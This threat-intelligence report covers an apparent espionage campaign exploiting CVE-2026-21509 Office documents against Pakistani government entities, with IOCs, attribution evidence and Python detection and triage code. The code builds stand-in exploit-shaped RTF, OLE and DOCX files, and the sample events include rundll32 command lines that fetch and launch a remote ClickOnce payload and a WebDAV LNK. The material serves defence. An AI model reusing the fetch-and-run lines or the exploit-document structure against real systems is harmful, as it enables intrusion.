Severity: critical | Category: APT

CVE-2026-21509 South Asian Espionage Campaign (WarMachine/MALDEV01) — Breakglass Intelligence Report

Investigated: April 3, 2026 | Published: April 3, 2026
Threat Actors: APT28, APT-04
Tags: agenda, doc, cve, rat, apt, phishing, cloudflare, tor, lnk

TLP: WHITE
Date: 2026-04-03
Analyst: GHOST (Breakglass Intelligence)
Classification: APT / State-Sponsored Espionage
Status: COMPLETE

Executive Summary

An India-linked threat actor operating from machine MALDEV01 under username WarMachine is exploiting CVE-2026-21509 (Microsoft Office security feature bypass, CVSS 7.8) to target Pakistani government entities. The primary target is the Sindh Integrated Emergency & Health Services (SIEHS), with production payloads hosted on a compromised Punjab Safe Cities Authority (PSCA) government server. The attack chain weaponizes OLE compound, RTF and DOCX documents with embedded Shell.Explorer.1 / WebBrowser controls that navigate to a remote resource (a ClickOnce .application in the production samples, an LNK fetched over WebDAV in the test samples), bypassing Microsoft Office's OLE security mitigations.

Developer artifacts reveal English-India locale (0x4009/0x4C09), WPS Office authoring environment, and a dedicated malware development workstation -- consistent with India-linked APT groups (SideWinder, Confucius, or Patchwork/Dropping Elephant). Test samples uploaded to MalwareBazaar contain an internal WebDAV server IP (192.168.171.236) with a "tets.LnK" typo, revealing hasty OPSEC.

A separate cluster of CVE-2026-21509 exploit documents (design.docx) shows Chinese-language metadata (creator "qb.li", a last-modified-by field containing the Chinese name 遂愿, KSO locale 2052), suggesting either a shared exploit builder tool or independent adoption of the technique by a Chinese-speaking actor.

This campaign is distinct from APT28/Operation Neusploit targeting Eastern Europe, representing the first documented South Asian state-sponsored use of CVE-2026-21509.

Key Findings

  • CVE-2026-21509 exploit documents targeting Pakistani government (SIEHS emergency services, PSCA law enforcement)
  • Developer machine MALDEV01 ("Malware Development 01") and username WarMachine embedded in OLE metadata
  • English-India locale (0x4009 in OLE, deflang19465 in RTF) across all samples in the India cluster
  • WPS Office 12.2.0.23196 used as authoring tool (common in South Asian APT toolchains)
  • Production payload: ClickOnce .application hosted on compromised sbis.psca.gop.pk (Government of Punjab, Pakistan)
  • Test payload: WebDAV LNK fetch from 192.168.171.236 (internal dev network) with "tets" typo
  • Second cluster (design.docx): Chinese-language metadata, WebBrowser ActiveX CLSID variant, WPS Cloud userId 704171050
  • Shared WPS UUID (F1E327BC-269C-435d-A152-05C5408002CA) across both clusters -- may indicate shared tool or pirated WPS install

What Was Found vs. What Was Known

Aspect | Prior Reporting | Our Findings
CVE-2026-21509 Users | APT28 (Russia) only | India-linked APT + possibly a Chinese-speaking actor
Target Geography | Ukraine, Czech Republic, Poland, Romania | Pakistan (SIEHS, PSCA government entities)
Attribution | APT28/Fancy Bear | WarMachine/MALDEV01 (India-linked, MEDIUM-HIGH confidence)
Developer Artifacts | None for South Asian use | MALDEV01, WarMachine, MALDE, WPS Office build, India locale
Compromised Infra | freefoodaid.com, wellnesscaremed.com | sbis.psca.gop.pk (Pakistan gov)
Test Infrastructure | None reported | 192.168.171.236 internal WebDAV + "tets" typo
Chinese Operator | Not reported | design.docx with qb.li / userId 704171050

Attack Chain

Spear-phishing email (themed around SIEHS / emergency services)
    |
    v
Weaponized Document (3 formats observed)
    |-- OLE Compound (.doc): Shell.Explorer.1 CLSID embedded directly
    |-- RTF (.doc): objocx/objemb with hex-encoded OLE containing Shell.Explorer.1
    |-- DOCX (.docx): ActiveX WebBrowser control {8856F961-340A-11D0-A96B-00C04FD705A2}
    |
    v
CVE-2026-21509 bypass -- OLE object instantiation despite mitigations
    |
    v
Navigate() / WebBrowser call to fetch remote resource
    |-- Production: hxxps://sbis.psca.gop.pk/css/PDF-READER/PDF%20Viewer.application
    |-- Test/Dev:   file://192.168.171.236@ssl/te/tets.LnK?init=1
    |
    v
LNK / ClickOnce application auto-executed
    |
    v
Payload deployment (not recovered -- PSCA server offline)

Infrastructure Analysis

Compromised Government Infrastructure

Asset | Organization | IP | Status
sbis.psca.gop.pk | Punjab Safe Cities Authority, Govt of Punjab, Pakistan | 103.119.125.125 | DOWN

Domain | Registrar | Created | NS | Status
wildishadventure.com | Namecheap | 2025-08-08 | odin.ns.cloudflare.com, zariyah.ns.cloudflare.com | DOWN (HTTP 521, Cloudflare origin unreachable)

Developer Test Infrastructure

IP | Purpose | Evidence
192.168.171.236 | Internal WebDAV server for exploit testing | Embedded in cori.doc and c9.doc

Malware Analysis

Sample Cluster 1: India-Linked (WarMachine/MALDEV01)

Hash (SHA256) | Filename | Type | Size (bytes) | First Seen
8e53683133e7e1ddd1d8728b6ba8b9b80ec40f6772422c8adc8002bafe553f7b | SIEHS Document.doc | OLE/DOC | 329,216 | 2026-03-11
520270adf2f2f69021713dfaf5c961d88ba8b06a54d85c68b73bc590ef0ef206 | cori.doc | RTF | 16,816 | 2026-03-27
b68e729104d051eaf3d118f9fd9c3fde81255f2b14f349a9ce421423407e5a77 | c9.doc | RTF | 16,889 | 2026-04-01

Sample Cluster 2: Chinese-Language Operator

Hash (SHA256) | Filename | Type | Size (bytes) | First Seen
0ed6dba3092b7e546c0ee9c6fa7ed1cf9f4c20ef28e6d96f9c7e2a19c20b6a6d | design.docx | DOCX | 31,502 | 2026-03-31

Developer Fingerprints (Cluster 1 - WarMachine)

Artifact | Value
Machine Name | MALDEV01
Username | WarMachine / WarMac
Author | MALDE
Application | WPS Office 12.2.0.23196
WPS UUID | F1E327BC-269C-435d-A152-05C5408002CA
Locale (OLE) | 16393 / 0x4009 (English-India)
Locale (RTF) | 19465 / 0x4C09 (English-India)
Created | 2026-02-12 06:17:00 UTC
Last Modified | 2026-02-18 12:16:56 UTC

Developer Fingerprints (Cluster 2 - Chinese Operator)

Artifact | Value
Creator | qb.li
Last Modified By | 遂愿 (Chinese: "as one wishes")
KSO Locale | 2052 (Chinese Simplified)
WPS Cloud userId | 704171050
WPS Cloud hdid | 4118fa5d982d0271c78892158f470f4c
Application | WPS Office 12.1.0.24657
Template Created | 2022-08-31

CVE-2026-21509 Exploit Mechanism

  • Shell.Explorer.1 CLSID: {EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B}
  • WebBrowser CLSID: {8856F961-340A-11D0-A96B-00C04FD705A2}
  • RTF obfuscation: objocx/objemb with interleaved comment groups
  • DOCX variant: Standard OOXML ActiveX embedding with persistStorage
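The three document shapes in the attack chain and the CLSID, locale and metadata markers listed above can be triaged with one scanner. The Python below is an added example written for this report; it is not tooling from the original analysis or from the referenced YARA rules. The three sample files it builds are constructed stand-ins (an RTF whose objdata hex stream is broken up by {\*\comment} groups, an OLE header with the Shell.Explorer.1 GUID and developer strings appended, and a minimal DOCX carrying an activeX part and a core.xml creator), not the real samples; the tag names it emits are this example's own.

```python
"""Triage scanner for the OLE, RTF and DOCX shapes in the attack chain above
(added example, not tooling from the original analysis or its YARA rules)."""
import io
import re
import uuid
import zipfile

CLSIDS = {
    "EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B": "Shell.Explorer.1",
    "8856F961-340A-11D0-A96B-00C04FD705A2": "WebBrowser",
}
DEV_STRINGS = ["MALDEV01", "WarMachine", "WarMac", "MALDE", "fdjgbdjfbgjkdbfg"]
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
CONTROL = re.compile(r"\\(?:[a-zA-Z]+-?\d*|.)", re.S)  # RTF control word or symbol

def rtf_objdata_bytes(text):
    """Decode every \\objdata hex stream, skipping nested groups (the
    interleaved {\\*\\comment} obfuscation) and control words."""
    blobs = []
    for m in re.finditer(r"\\objdata", text):
        i, depth, digits = m.end(), 0, []
        while i < len(text):
            c = text[i]
            if c == "{":
                depth += 1
            elif c == "}":
                if depth == 0:
                    break  # end of the objdata group
                depth -= 1
            elif depth == 0 and c == "\\":
                mm = CONTROL.match(text, i)
                i = mm.end() if mm else i + 1
                continue
            elif depth == 0 and c in "0123456789abcdefABCDEF":
                digits.append(c)
            i += 1
        h = "".join(digits)
        blobs.append(bytes.fromhex(h[: len(h) - len(h) % 2]))
    return blobs

def scan_bytes(data, findings):
    """Raw search for the little-endian GUID form and the developer strings."""
    for guid, name in CLSIDS.items():
        if uuid.UUID(guid).bytes_le in data:
            findings.add("clsid:" + name)
    for s in DEV_STRINGS:
        if s.encode() in data or s.encode("utf-16-le") in data:
            findings.add("dev:" + s)

def scan_document(data):
    """Return sorted indicator tags for an OLE, RTF or DOCX blob."""
    findings = set()
    if data.startswith(OLE_MAGIC):
        findings.add("format:ole")
        scan_bytes(data, findings)
    elif data.lstrip().startswith(b"{\\rt"):
        findings.add("format:rtf")
        text = data.decode("latin-1")
        m = re.search(r"\\deflang(\d+)", text)
        if m:
            findings.add("deflang:" + m.group(1))  # 19465 = the India marker
        for name in CLSIDS.values():
            if re.search(r"\\objclass\s+" + re.escape(name), text):
                findings.add("objclass:" + name)
        for blob in rtf_objdata_bytes(text):
            scan_bytes(blob, findings)
        scan_bytes(data, findings)  # builder comment / author in clear text
    elif data.startswith(b"PK"):
        findings.add("format:docx")
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            for name in z.namelist():
                part = z.read(name).decode("utf-8", "replace")
                if name.startswith("word/activeX/") and name.endswith(".xml"):
                    for guid, label in CLSIDS.items():
                        if guid.lower() in part.lower():
                            findings.add("clsid:" + label)
                elif name == "docProps/core.xml":
                    scan_bytes(part.encode(), findings)
                    m = re.search(r"<dc:creator>([^<]*)</dc:creator>", part)
                    if m:
                        findings.add("creator:" + m.group(1))
    return sorted(findings)

def build_samples():
    """Constructed stand-ins for the three formats (not real exploit files)."""
    shell_le = uuid.UUID("EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B").bytes_le
    hx = shell_le.hex()
    rtf = (r"{\rtf1\ansi\deflang19465{\*\comment fdjgbdjfbgjkdbfg}"
           r"{\object\objocx{\*\objclass Shell.Explorer.1}{\*\objdata 01050000"
           + hx[:12] + r"{\*\comment x}" + hx[12:] + r"\par 00}}}")
    ole = OLE_MAGIC + b"\x00" * 24 + shell_le + "WarMachine".encode("utf-16-le") + b"MALDEV01"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/activeX/activeX1.xml",
                   '<ax:ocx ax:classid="{8856F961-340A-11D0-A96B-00C04FD705A2}" '
                   'ax:persistence="persistStorage"/>')
        z.writestr("docProps/core.xml",
                   "<cp:coreProperties><dc:creator>qb.li</dc:creator></cp:coreProperties>")
    return {"rtf": rtf.encode("latin-1"), "ole": ole, "docx": buf.getvalue()}
```

Run it with `for k, b in build_samples().items(): print(k, scan_document(b))`, or point `scan_document` at real file bytes. The RTF path matters most: a YARA string match on the GUID hex fails once the builder interleaves comment groups, so the scanner rebuilds the hex exactly as the RTF reader does before looking for the little-endian GUID.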

Threat Actor Profile

Attribution Assessment

  • Confidence: MEDIUM-HIGH (India-linked APT)
  • Country: India (HIGH confidence)
  • Evidence: English-India locale, WPS Office, MALDEV01 machine name, Pakistan gov targeting, PSCA compromise, WebDAV+LNK chain matching SideWinder/Confucius TTPs
  • Possible Groups: SideWinder (T-APT-04), Confucius (APT-Q-40), Patchwork/Dropping Elephant
  • Motivation: Espionage (intelligence on Pakistani emergency services / law enforcement)

OPSEC Failures

  1. MALDEV01 machine name in metadata
  2. WarMachine username not sanitized
  3. MALDE author field not cleared
  4. English-India locale not scrubbed
  5. Internal test IP (192.168.171.236) in released samples
  6. WPS Office build fingerprint with unique UUID
  7. "tets" typo in test LNK path
  8. WPS Cloud account identifiers (userId 704171050, hdid) left in Cluster 2 metadata
  9. RTF comment "fdjgbdjfbgjkdbfg" fingerprints the builder

Victim Analysis

Organization | Sector | Country | Evidence | Confidence
SIEHS | Emergency Services / Government | Pakistan | Filename "SIEHS Document.doc" | HIGH
PSCA | Law Enforcement / Government | Pakistan | Compromised for payload hosting | MEDIUM

MITRE ATT&CK Mapping

Tactic | Technique | ID
Initial Access | Spearphishing Attachment | T1566.001
Execution | Exploitation for Client Execution | T1203
Execution | User Execution: Malicious File | T1204.002
Defense Evasion | Obfuscated Files or Information | T1027
Defense Evasion | Exploitation for Defense Evasion | T1211
Command and Control | Ingress Tool Transfer | T1105
Resource Development | Compromise Infrastructure: Server | T1584.004
Resource Development | Develop Capabilities: Malware | T1587.001

IOC Summary

Network Indicators

hxxps://sbis[.]psca[.]gop[.]pk/css/PDF-READER/PDF%20Viewer.application
file://192[.]168[.]171[.]236@ssl/te/tets.LnK?init=1
wildishadventure[.]com
103[.]119[.]125[.]125

File Indicators

8e53683133e7e1ddd1d8728b6ba8b9b80ec40f6772422c8adc8002bafe553f7b  SIEHS Document.doc
520270adf2f2f69021713dfaf5c961d88ba8b06a54d85c68b73bc590ef0ef206  cori.doc
b68e729104d051eaf3d118f9fd9c3fde81255f2b14f349a9ce421423407e5a77  c9.doc
0ed6dba3092b7e546c0ee9c6fa7ed1cf9f4c20ef28e6d96f9c7e2a19c20b6a6d  design.docx

Behavioral Indicators

CLSID: {EAB22AC3-30C1-11CF-A7EB-0000C05BAE0B} (Shell.Explorer.1)
CLSID: {8856F961-340A-11D0-A96B-00C04FD705A2} (WebBrowser)
deflang19465 (English-India RTF locale)
OLE Author: MALDE
OLE Machine: MALDEV01
OLE User: WarMachine
WPS UUID: F1E327BC-269C-435d-A152-05C5408002CA
RTF comment: fdjgbdjfbgjkdbfg

YARA Rules

See yara_rules/cve_2026_21509_south_asia.yar (4 rules)

Suricata Rules

See suricata_rules.rules (SIDs 9000100-9000103)

Recommendations

Immediate (24-48 hours)

  • Block sbis.psca.gop.pk/css/PDF-READER/ at web proxy
  • Deploy YARA rules for Shell.Explorer.1/WebBrowser CLSIDs with India locale markers
  • Alert on WebDAV and HTTP(S) connections initiated by Office and WPS processes to external IPs. A file://host@ssl/ UNC path is served by the WebClient service (the WebDAV Mini-Redirector), so the TCP session comes from the svchost.exe hosting WebClient rather than from the Office process; correlate on the rundll32.exe davclnt.dll,DavSetCookie child that the document-opening process spawns when it touches the path
  • Notify Pakistan CERT about compromised PSCA infrastructure
  • Notify SIEHS about active targeting

Short-term (1-2 weeks)

  • Patch Office for CVE-2026-21509 (KB5032990+)
  • Hunt for ClickOnce .application files fetched or launched from Office and WPS processes (dfsvc.exe launches, .application URLs in proxy logs)
  • Monitor MalwareBazaar for new CVE-2026-21509 samples from reporter smica83
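The WebDAV alert in the Immediate list and the ClickOnce hunt in the Short-term list above, as an added example run over constructed Sysmon-style events. These are not telemetry from this investigation; the field names, the Office/WPS image list and the sample command lines are assumptions modelled on the report's IOCs. It also goes one step beyond the page: any common living-off-the-land binary spawned under an Office process is flagged at medium severity.

```python
"""Detection pass for the WebDAV and ClickOnce hunts above, run over
constructed Sysmon-style events (added example; the field names and the
image lists are assumptions, not telemetry from this investigation)."""
import ipaddress

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "wps.exe", "et.exe", "wpp.exe"}
# living-off-the-land children that merit a medium alert under an Office parent
LOLBINS = {"rundll32.exe", "mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe",
           "cscript.exe", "regsvr32.exe", "dfsvc.exe", "certutil.exe"}

WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
RUNDLL = r"C:\Windows\System32\rundll32.exe"

# Constructed events modelled on the report's IOCs (id 1 = process create,
# id 3 = network connect, after the Sysmon event IDs).
EVENTS = [
    {"id": 1, "image": RUNDLL, "parent": WINWORD,
     "cmd": r"rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie "
            r"192.168.171.236@ssl http://192.168.171.236@ssl/te/tets.LnK"},
    {"id": 3, "image": WINWORD, "dst_ip": "103.119.125.125", "dst_port": 443},
    {"id": 3, "image": WINWORD, "dst_ip": "192.168.171.236", "dst_port": 443},
    {"id": 1, "image": RUNDLL, "parent": WINWORD,
     "cmd": "rundll32.exe dfshim.dll,ShOpenVerbApplication "
            "https://sbis.psca.gop.pk/css/PDF-READER/PDF%20Viewer.application"},
    {"id": 1, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe",
     "parent": r"C:\Windows\System32\svchost.exe", "cmd": "dfsvc.exe"},
    {"id": 3, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dst_ip": "1.1.1.1", "dst_port": 443},                        # benign browser
    {"id": 1, "image": r"C:\Windows\splwow64.exe", "parent": WINWORD,
     "cmd": "splwow64.exe"},                                        # benign Office child
]

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (severity, rule, detail) tuples for the events that match."""
    alerts = []
    for e in events:
        img = basename(e["image"])
        cmd = e.get("cmd", "").lower()
        if e["id"] == 1:
            parent = basename(e.get("parent", ""))
            if img == "dfsvc.exe":
                # ClickOnce deployment service started: an .application ran
                alerts.append(("medium", "clickonce_launch", e["image"]))
            elif parent in OFFICE:
                if img == "rundll32.exe" and "davclnt.dll,davsetcookie" in cmd:
                    # WebDAV path touched from a document; the TCP session
                    # itself belongs to the WebClient svchost, not to Office
                    alerts.append(("high", "webdav_from_office", cmd))
                elif "shopenverbapplication" in cmd or ".application" in cmd:
                    alerts.append(("high", "clickonce_from_office", cmd))
                elif img in LOLBINS:
                    alerts.append(("medium", "suspicious_office_child", cmd))
        elif e["id"] == 3 and img in OFFICE and e["dst_port"] in (80, 443):
            # in-process WebBrowser navigation: the HTTP(S) request is Office's own
            if ipaddress.ip_address(e["dst_ip"]).is_private:
                alerts.append(("low", "office_http_internal", e["dst_ip"]))
            else:
                alerts.append(("high", "office_http_external", e["dst_ip"]))
    return alerts

def summarize(alerts):
    """Count alerts per severity."""
    counts = {}
    for sev, _, _ in alerts:
        counts[sev] = counts.get(sev, 0) + 1
    return counts

if __name__ == "__main__":
    for sev, rule, detail in detect(EVENTS):
        print(sev, rule, detail)
```

The internal-destination case is kept at low severity rather than dropped: in this campaign the 192.168.171.236 WebDAV host was the developer's test network, and the same pattern inside a victim network would mean an attacker already holds an internal foothold serving payloads.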

Medium-term (1-3 months)

  • Block the Shell.Explorer.1 and WebBrowser CLSIDs with the Office COM kill-bit: set the Compatibility Flags DWORD to 0x400 under HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{CLSID} (and under the Wow6432Node hive for 32-bit Office on 64-bit Windows); test first, since legitimate documents that embed a browser control will stop rendering it
  • Monitor wildishadventure.com for reactivation
  • Track WPS Cloud userId 704171050
